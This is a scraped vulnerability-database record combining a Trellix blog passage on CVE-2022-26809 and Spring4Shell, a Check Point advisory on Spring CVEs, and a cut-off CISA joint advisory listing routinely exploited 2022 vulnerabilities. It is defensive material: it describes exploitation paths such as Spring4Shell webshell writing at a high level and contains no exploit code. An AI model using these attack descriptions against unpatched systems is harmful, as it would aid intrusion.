protocol](<https://docs.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview>) as the attack vector. As a result, Microsoft initially recommended blocking TCP ports 139 and 445, ports utilized by SMB, in their [Microsoft\u2019s Security Update Guide](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>). Although these ports are not specific to MSRPC, leaving them open can still result in exploitation of the vulnerability, as MSRPC can utilize SMB for transport. 
In theory, the same may hold true for MSRPC over TCP and MSRPC over HTTP.\n\nThat being said, there is currently very little credible information to be found regarding the specific details of what is needed to exploit the vulnerability besides some high-level analysis done by [Akamai](<https://www.akamai.com/blog/security/critical-remote-code-execution-vulnerabilities-windows-rpc-runtime>) and [MalwareTech](<https://www.malwaretech.com/2022/04/video-exploiting-windows-rpc-cve-2022-26809-explained-patch-analysis.html>) based on patch diffing. According to both sources, the patch added some integer overflow checks that protect against a potential heap overflow condition in functions responsible for processing RPC packets, presumably the means by which remote code execution would be possible.\n\n### Who cares?\n\nUltimately any org with any Windows footprint in their environment should be taking this very seriously, as exploits leveraging this vulnerability will be easily wormable, making it a prime vehicle for malware campaigns. Microsoft has also indicated that just about every version of Windows since Windows 7/Server 2008 is vulnerable, so don\u2019t expect being a decade behind on your Windows updates to save you \u2013 I\u2019m looking at you, healthcare industry.\n\nThankfully for all the sysadmins and analysts experiencing Vietnam flashbacks right now, there does not (as of this writing) appear to be any legitimate PoC code for CVE-2022-26809, much less any detected exploitation out in the wild, meaning there is still time to lock things down before the bad guys start sending payloads to every one of the 700,000 Windows machines with port 445 exposed to the internet:\n\n\n\nI\u2019m sure all 700,000 are fully patched\u2026 right?\n\n### What can I do?\n\nLike a broken record with a steadfast conscience, I will continue to tell you to patch your systems now. Like, **right now**. 
Since disabling RPC outright isn\u2019t feasible, patching and Viking funeral are your only two surefire means of keeping your Windows machines safe. But like a Sex Ed teacher preaching abstinence, I realize that providing alternate means of mitigating risk is equally important. If you can\u2019t patch right this second, a good starting point would be to block TCP ports 135 (MSRPC via TCP), 139 and 445 (MSRPC via SMB), and 593 (MSRPC via HTTP) on your perimeter firewall. Bear in mind that perimeter blocking only addresses internet-facing exposure; since this bug is wormable, a single compromised host inside the network can still reach these ports on its neighbors, so host-based firewall rules and internal segmentation matter just as much. Ultimately, however, good firewall rules are founded in whitelisting ports for necessary services, not blacklisting dangerous ones reactively like an unwinnable game of whack-a-mole.\n\n \n\n\n## CVE-2022-22965: Mirai botnet springs back to life\n\n### What is it?\n\nIn order to adequately describe what Spring4Shell is, it\u2019s important to first describe what it is **not** \u2013 it is **not** [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>), a superficially similar vuln disclosed around the same time that allows for server-side code injection in [Spring Cloud Function](<https://spring.io/projects/spring-cloud-function>). In late March, during the first 72 hours of these two vulns going public, there was a lot of misinformation being spread on Twitter due to the conflation of these two vulnerabilities, with many referring to both as \u201cSpring4Shell.\u201d Canonically, however, Spring4Shell refers exclusively to CVE-2022-22965, and though both were granted a CVSS score of 9.8, Spring4Shell proper is far more impactful, hence its inclusion on our list and the omission of its ugly cousin \u2013 though note that CVE-2022-22963 is itself an unauthenticated RCE (SpEL injection via a user-supplied routing expression) and should not be deprioritized simply because it lacks the catchy name.\n\nWith that out of the way, let\u2019s briefly describe what the Spring Framework is, as it\u2019s the target of this particular vulnerability. 
Put simply, it\u2019s a very popular open-source framework developed by VMware that aids with the development of enterprise-level Java applications by providing support for features such as dependency injection, data binding, and web frameworks for both model-view-controller (Spring MVC) and reactive (Spring WebFlux) designs. One of the features the Spring Framework provides to developers is the ability to map HTTP requests to specific handler methods. These request handler methods, in turn, can instantiate objects and automatically populate their members based on parameters provided via these same HTTP requests, a feature known as _parameter binding_.\n\nA much older bug, [CVE-2010-1622](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>), abused this feature combined with Java\u2019s built-in `[getClassLoader()](<https://www.tutorialspoint.com/java/lang/class_getclassloader.htm>)` method to manipulate Tomcat\u2019s `ClassLoader` object into loading a JAR file from an attacker-controlled server, thereby achieving RCE. Spring quickly patched this attack vector by adding a check that excludes `getClassLoader()` from the parameter binding mechanism. The introduction of [Modules](<https://www.oracle.com/corporate/features/understanding-java-9-modules.html>) in Java 9, however, added another means of accessing a `ClassLoader`, thus creating a bypass for Spring\u2019s previous patch and giving birth to CVE-2022-22965. Unlike its ancestor, exploitation of Spring4Shell has largely involved creating a webshell (hence the name) on a target server running Tomcat by writing a custom .jsp file to the web root via Tomcat\u2019s `[AccessLogValve](<https://tomcat.apache.org/tomcat-7.0-doc/api/org/apache/catalina/valves/AccessLogValve.html>)` class, but the underlying vulnerability of abusing request parameter binding is largely identical.\n\n### Who cares?\n\nAs far as impact goes, there\u2019s good news and there\u2019s bad news. 
The good news is that not every Java app utilizing Spring Framework is vulnerable by default; for an app to be vulnerable via the publicly known exploit path, it must meet all these criteria:\n\n * Uses JDK >= 9.0\n * Packaged as a Web Application Archive (WAR)\n * Deployed on a standalone Servlet container \n * The Servlet must have either the spring-webmvc or spring-webflux packages as a dependency\n * Uses a version of Spring Framework older than 5.2.20/5.3.18 (where the patch was introduced)\n\nTreat this list as a floor rather than a guarantee of safety: as the mitigation section below notes, the underlying data-binding flaw is more general than the Tomcat/WAR attack vector, so an app that misses one of these criteria may still be exposed through a path nobody has published yet.\n\nThe bad news is that the bad guys have a sizable head start in this race. This is in part due to the details of the vulnerability and even a PoC exploit [being leaked](<https://twitter.com/vxunderground/status/1509170582469943303>) in advance of the CVE\u2019s planned publication, which was meant to coincide with Spring\u2019s patch. In fact, honeypots detected exploitation of Spring4Shell as early as March 31, just two days after disclosure, and exploitation attempts have continued ever since. The [initial PoC code](<https://github.com/TheGejr/SpringShell>) made public was specific to Spring applications that used Tomcat Servlet containers, but Spring has since confirmed that [both Payara and Glassfish Servlets are also vulnerable](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#am-i-impacted>).\n\nI lied earlier, there\u2019s even worse news. [Trend Micro has reported](<https://www.trendmicro.com/en_be/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html>) that Spring4Shell is already being utilized in an extensive campaign that, in the spirit of Easter, has resurrected the [Mirai botnet](<https://www.cloudflare.com/learning/ddos/glossary/mirai-botnet/>) malware. 
Doesn\u2019t it just fill you with nostalgia?\n\n### What can I do?\n\nWhile updating Spring Framework to 5.2.20/5.3.18 or above is obviously the best solution, Spring has also outlined [several mitigation strategies](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#suggested-workarounds>) in their security guidance:\n\n * Upgrade Tomcat to at least 8.5.78/9.0.62/10.0.20. While this does not mitigate the vulnerability as a whole, it does mitigate the Tomcat attack vector, which is by far the most prevalent way this vuln is being exploited.\n * Downgrading Java to a version below 9 removes the Module bypass that makes CVE-2022-22965 possible; however, utilizing a prehistoric version of Java likely carries its own security risks.\n * Whitelisting only the parameters you want to allow your users to bind via the `[setAllowedFields()](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html#setAllowedFields-java.lang.String...->)` method is a valid mitigation, as is blacklisting the fields used by exploits via `[setDisallowedFields()](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html#setDisallowedFields-java.lang.String...->)`. Unfortunately, setting these fields globally runs the risk of them being overridden locally. To make matters even more complicated, it was discovered that these properties are unintuitively case-sensitive, a quirk that was not clearly documented, leaving holes in many mitigation attempts. The issue is being tracked as [CVE-2022-22968](<https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968>) and is fixed in Spring Framework versions 5.2.21 and 5.3.19. 
But hey, at least they didn\u2019t tell us it was \u201cworking as intended.\u201d\n", "cvss3": {}, "published": "2022-05-04T00:00:00", "type": "trellix", "title": "The Bug Report \u2013 April 2022 Edition", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-1622", "CVE-2022-21449", "CVE-2022-22963", "CVE-2022-22965", "CVE-2022-22968", "CVE-2022-26809"], "modified": "2022-05-04T00:00:00", "id": "TRELLIX:33C611A7064C89E309C4A45CAE585BD5", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/the-bug-report-april-2022-edition.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_security": [{"lastseen": "2023-04-20T02:09:19", "description": "Solution\n\nOn March 29, 2022, new CVEs were published on Spring Cloud: [CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>), [CVE-2022-22946](<https://vulners.com/cve/CVE-2022-22946>), [CVE-2022-22947](<https://vulners.com/cve/CVE-2022-22947>), and [CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>).\n\nOn March 31, 2022, a bypass to the fix for [CVE-2010-1622](<https://vulners.com/cve/CVE-2010-1622>) was published by Praetorian, and received the nickname \"Spring4Shell\" (see [Spring Core on JDK9+ is vulnerable to remote code execution](<https://www.praetorian.com/blog/spring-core-jdk9-rce>)). Later, it was assigned to [CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>).\n\nThe Check Point Infinity architecture is protected against this threat. We verified that this vulnerability does not affect our Infinity portfolio (including Quantum Security Gateways, Smart Management, Quantum Spark appliances with Gaia Embedded OS, Harmony Endpoint, Harmony Mobile, ThreatCloud, and CloudGuard). 
\nWe will continue to update you on any new development of this security event.\n\n### \nCheck Point Products Status\n\n**Notes:**\n\n * All Check Point software versions, including out of support versions, are not vulnerable.\n * All Check Point appliances are not vulnerable.\n\n### \nIPS protections\n\nCheck Point released these IPS protections:\n\n * Spring Core Remote Code Execution ([CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>))\n * Spring Cloud Function Remote Code Execution ([CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>))\n * Spring Cloud Gateway Remote Code Execution ([CVE-2022-22947](<https://vulners.com/cve/CVE-2022-22947>))\n\nTo see these IPS protections in SmartConsole:\n\n 1. From the left navigation panel, click **Security Policies**.\n 2. In the upper pane, click **Threat Prevention** > **Custom Policy**.\n 3. In the lower pane, click **IPS Protections**.\n 4. In the top search field, enter the name of the CVE number.\n\n**Best Practice** \\- Check Point recommends activating HTTPS Inspection (in the Security Gateway / Cluster object properties > HTTPS Inspection view), as the attack payload may appear in encrypted or decrypted traffic.\n\n### \nHarmony Endpoint for Linux Protection\n\n * Exploit_Linux_Spring4Shell_B\n\n### \nCloudGuard Containers Security Protection\n\n * Exploit_Linux_Spring4Shell_A\n\n**Related Articles:**\n\n * [sk126352 - Check Point Response to Spring Framework Vulnerabilities: CVE-2018-1270, CVE-2018-1273, CVE-2018-1275](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk126352>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": 
"3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T21:41:02", "type": "checkpoint_security", "title": "Check Point Response to Spring Vulnerabilities CVE-2022-22963, CVE-2022-22946, CVE-2022-22947, CVE-2022-22965 (Spring4Shell) and CVE-2022-22950 ", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2018-1270", "CVE-2018-1273", "CVE-2018-1275", "CVE-2022-22946", "CVE-2022-22947", "CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-30T21:41:02", "id": "CPS:SK178605", "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2023-09-30T17:14:30", "description": "### **SUMMARY**\n\nThe following cybersecurity agencies coauthored this joint Cybersecurity Advisory (CSA):\n\n * United States: The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI)\n * Australia: Australian Signals Directorate\u2019s Australian Cyber Security Centre (ACSC)\n * Canada: Canadian Centre for Cyber Security (CCCS)\n * New Zealand: New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand (CERT NZ)\n * United Kingdom: National Cyber Security Centre (NCSC-UK)\n\nThis advisory provides details on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently 
exploited by malicious cyber actors in 2022 and the associated Common Weakness Enumeration(s) (CWE). In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems.\n\nThe authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the recommendations found within the Mitigations section of this advisory\u2014including the following\u2014to reduce the risk of compromise by malicious cyber actors.\n\n * **Vendors, designers, and developers**: Implement [secure-by-design and -default principles and tactics](<https://www.cisa.gov/resources-tools/resources/secure-by-design-and-default> \"Security-by-Design and -Default\" ) to reduce the prevalence of vulnerabilities in your software. \n * **Follow the Secure Software Development Framework (SSDF)**, also known as [SP 800-218](<https://csrc.nist.gov/publications/detail/sp/800-218/final> \"NIST SP 800-218\" ), and implement secure design practices into each stage of the software development life cycle (SDLC). As part of this, establish a coordinated vulnerability disclosure program that includes processes to determine root causes of discovered vulnerabilities.\n * **Prioritize secure-by-default configurations**, such as eliminating default passwords, or requiring additional configuration changes to enhance product security.\n * **Ensure that published CVEs include the proper CWE field** identifying the root cause of the vulnerability.\n * **End-user organizations**: \n * **Apply timely patches to systems**. 
**Note**: First check for signs of compromise if CVEs identified in this CSA have not been patched.\n * Implement a centralized patch management system.\n * **Use security tools, such as endpoint detection and response (EDR), web application firewalls, and network protocol analyzers**.\n * **Ask your software providers to discuss their secure by design program** and to provide links to information about how they are working to remove classes of vulnerabilities and to set secure default settings.\n\nDownload the PDF version of this report:\n\nAA23-215A PDF (PDF, 980.90 KB )\n\n### **TECHNICAL DETAILS**\n\n#### **Key Findings**\n\nIn 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems. Proof of concept (PoC) code was publicly available for many of the software vulnerabilities or vulnerability chains, likely facilitating exploitation by a broader range of malicious cyber actors.\n\nMalicious cyber actors generally have the most success exploiting known vulnerabilities within the first two years of public disclosure\u2014the value of such vulnerabilities gradually decreases as software is patched or upgraded. Timely patching reduces the effectiveness of known, exploitable vulnerabilities, possibly decreasing the pace of malicious cyber actor operations and forcing pursuit of more costly and time-consuming methods (such as developing zero-day exploits or conducting software supply chain operations).\n\nMalicious cyber actors likely prioritize developing exploits for severe and globally prevalent CVEs. While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for critical, wide-spread, and publicly known vulnerabilities gives actors low-cost, high-impact tools they can use for several years. 
Additionally, cyber actors likely give higher priority to vulnerabilities that are more prevalent in their specific targets\u2019 networks. Multiple CVE or CVE chains require the actor to send a malicious web request to the vulnerable device, which often includes unique signatures that can be detected through deep packet inspection.\n\n#### **Top Routinely Exploited Vulnerabilities**\n\nTable 1 shows the top 12 vulnerabilities the co-authors observed malicious cyber actors routinely exploiting in 2022:\n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379> \"CVE-2018-13379\" )**. **This vulnerability, affecting Fortinet SSL VPNs, was also [routinely exploited in 2020](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-209a> \"Top Routinely Exploited Vulnerabilities\" ) and [2021](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a> \"2021 Top Routinely Exploited Vulnerabilities\" ). The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.\n * [**CVE-2021-34473**](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473> \"CVE-2021-34473\" )**, **[**CVE-2021-31207**](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207> \"CVE-2021-31207\" )**, **[**CVE-2021-34523**](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523> \"CVE-2021-34523\" )**.** These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft\u2019s web server). 
CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.\n * [**CVE-2021-40539**](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539> \"CVE-2021-40539\" )**.** This vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability [began in late 2021](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-259a> \"APT Actors Exploiting Newly Identified Vulnerability in ManageEngine ADSelfService Plus\" ) and [continued throughout 2022](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF> \"Top CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors\" ).\n * [**CVE-2021-26084**](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084> \"CVE-2021-26084\" )**.** This vulnerability, affecting Atlassian Confluence Server and Data Center (a web-based collaboration tool used by governments and private companies) could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a PoC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.\n * [**CVE-2021-44228**](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228> \"CVE-2021-44228\" )**.** This vulnerability, known as Log4Shell, affects Apache\u2019s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system. 
The actor can then steal information, launch ransomware, or conduct other malicious activity.[[1](<https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance>)] Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest in CVE-2021-44228 through the first half of 2022.\n * [**CVE-2022-22954**](<https://nvd.nist.gov/vuln/detail/CVE-2022-22954> \"CVE-2022-22954\" ), [**CVE-2022-22960**](<https://nvd.nist.gov/vuln/detail/CVE-2022-22960> \"CVE-2022-22960\" )**.** These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 [began in early 2022](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-138b> \"Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control\" ) and attempts continued throughout the remainder of the year.\n * [**CVE-2022-1388**](<https://nvd.nist.gov/vuln/detail/CVE-2022-1388> \"CVE-2022-1388\" )**.** This vulnerability allows unauthenticated malicious cyber actors to bypass iControl REST authentication on F5 BIG-IP application delivery and security software.\n * [**CVE-2022-30190**](<https://nvd.nist.gov/vuln/detail/CVE-2022-30190> \"CVE-2022-30190\" )**.** This vulnerability impacts the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated cyber actor could exploit this vulnerability to take control of an affected system.\n * [**CVE-2022-26134**](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134> \"CVE-2022-26134\" ). This critical RCE vulnerability affects Atlassian Confluence and Data Center. 
The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability ([CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084> \"CVE-2021-26084\" )), which cyber actors also exploited in 2022.\n_Table 1: Top 12 Routinely Exploited Vulnerabilities in 2022_\n\n**CVE**\n\n| \n\n**Vendor**\n\n| \n\n**Product**\n\n| \n\n**Type**\n\n| \n\n**CWE** \n \n---|---|---|---|--- \n \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379> \"CVE-2018-13379\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS and FortiProxy\n\n| \n\nSSL VPN credential exposure\n\n| \n\n[CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \\('Path Traversal'\\)\" ) \n \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473> \"CVE-2021-34473\" )\n\n(Proxy Shell)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nRCE\n\n| \n\n[CWE-918 Server-Side Request Forgery (SSRF)](<https://cwe.mitre.org/data/definitions/918.html> \"CWE-918: Server-Side Request Forgery \\(SSRF\\)\" ) \n \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207> \"CVE-2021-31207\" )\n\n(Proxy Shell)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nSecurity Feature Bypass\n\n| \n\n[CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \\('Path Traversal'\\)\" ) \n \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523> \"CVE-2021-34523\" )\n\n(Proxy Shell)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nElevation of Privilege\n\n| \n\n[CWE-287 Improper Authentication](<https://cwe.mitre.org/data/definitions/287.html> \"CWE-287: Improper Authentication\" ) \n 
\n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539> \"CVE-2021-40539\" )\n\n| \n\nZoho ManageEngine\n\n| \n\nADSelfService Plus\n\n| \n\nRCE/\n\nAuthentication Bypass\n\n| \n\n[CWE-287 Improper Authentication](<https://cwe.mitre.org/data/definitions/287.html> \"CWE-287: Improper Authentication\" ) \n \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084> \"CVE-2021-26084\" )\n\n| \n\nAtlassian\n\n| \n\nConfluence Server and Data Center\n\n| \n\nArbitrary code execution\n\n| \n\n[CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')](<https://cwe.mitre.org/data/definitions/74.html> \"CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component \\('Injection'\\)\" ) \n \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228> \"CVE-2021-44228\" )\n\n(Log4Shell)\n\n| \n\nApache\n\n| \n\nLog4j2\n\n| \n\nRCE\n\n| \n\n[CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')](<https://cwe.mitre.org/data/definitions/917.html> \"CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement \\('Expression Language Injection'\\)\" )\n\n[CWE-20 Improper Input Validation](<https://cwe.mitre.org/data/definitions/20.html> \"CWE-20: Improper Input Validation\" )\n\n[CWE-400 Uncontrolled Resource Consumption](<https://cwe.mitre.org/data/definitions/400.html> \"CWE-400: Uncontrolled Resource Consumption\" )\n\n[CWE-502 Deserialization of Untrusted Data](<https://cwe.mitre.org/data/definitions/502.html> \"CWE-502: Deserialization of Untrusted Data\" ) \n \n[CVE-2022-22954](<https://nvd.nist.gov/vuln/detail/CVE-2022-22954> \"CVE-2022-22954\" )\n\n| \n\nVMware\n\n| \n\nWorkspace ONE Access and Identity Manager\n\n| \n\nRCE\n\n| \n\n[CWE-94 Improper Control of Generation of Code ('Code Injection')](<https://cwe.mitre.org/data/definitions/94.html> \"CWE-94: 
Improper Control of Generation of Code \\('Code Injection'\\)\" ) \n \n[CVE-2022-22960](<https://nvd.nist.gov/vuln/detail/CVE-2022-22960> \"CVE-2022-22960\" )\n\n| \n\nVMware\n\n| \n\nWorkspace ONE Access, Identity Manager, and vRealize Automation\n\n| \n\nImproper Privilege Management\n\n| \n\n[CWE-269 Improper Privilege Management](<https://cwe.mitre.org/data/definitions/269.html> \"CWE-269: Improper Privilege Management\" ) \n \n[CVE-2022-1388](<https://nvd.nist.gov/vuln/detail/CVE-2022-1388> \"CVE-2022-1388\" )\n\n| \n\nF5 Networks\n\n| \n\nBIG-IP\n\n| \n\nMissing Authentication Vulnerability\n\n| \n\n[CWE-306 Missing Authentication for Critical Function](<https://cwe.mitre.org/data/definitions/306.html> \"CWE-306: Missing Authentication for Critical Function\" ) \n \n[CVE-2022-30190](<https://nvd.nist.gov/vuln/detail/CVE-2022-30190> \"CVE-2022-30190\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\nRCE\n\n| \n\nNone Listed \n \n[CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134> \"CVE-2022-26134\" )\n\n| \n\nAtlassian\n\n| \n\nConfluence Server and Data Center\n\n| \n\nRCE\n\n| \n\n[CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')](<https://cwe.mitre.org/data/definitions/74.html> \"CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component \\('Injection'\\)\" ) \n \n#### **Additional Routinely Exploited Vulnerabilities**\n\nIn addition to the 12 vulnerabilities listed in Table 1, the authoring agencies identified vulnerabilities\u2014listed in Table 2\u2014that were also routinely exploited by malicious cyber actors in 2022.\n\n_Table 2: Additional Routinely Exploited Vulnerabilities in 2022_\n\n**CVE**\n\n| \n\n**Vendor**\n\n| \n\n**Product**\n\n| \n\n**Type**\n\n| \n\n**CWE** \n \n---|---|---|---|--- \n \n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199> \"CVE-2017-0199\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| 
\n\nArbitrary Code Execution\n\n| \n\nNone Listed \n \n[CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882> \"CVE-2017-11882\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nArbitrary Code Execution\n\n| \n\n[CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer](<https://cwe.mitre.org/data/definitions/119.html> \"CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer\" ) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510> \"CVE-2019-11510\" )\n\n| \n\nIvanti\n\n| \n\nPulse Secure Pulse Connect Secure\n\n| \n\nArbitrary File Reading\n\n| \n\n[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \\('Path Traversal'\\)\" ) \n \n[CVE-2019-0708](<https://nvd.nist.gov/vuln/detail/CVE-2019-0708> \"CVE-2019-0708\" )\n\n| \n\nMicrosoft\n\n| \n\nRemote Desktop Services\n\n| \n\nRCE\n\n| \n\n[CWE-416: Use After Free](<https://cwe.mitre.org/data/definitions/416.html> \"CWE-416: Use After Free\" ) \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781> \"CVE-2019-19781\" )\n\n| \n\nCitrix\n\n| \n\nApplication Delivery Controller and Gateway\n\n| \n\nArbitrary Code Execution\n\n| \n\n[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \\('Path Traversal'\\)\" ) \n \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902> \"CVE-2020-5902\" )\n\n| \n\nF5 Networks\n\n| \n\nBIG-IP\n\n| \n\nRCE\n\n| \n\n[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \\('Path Traversal'\\)\" ) \n 
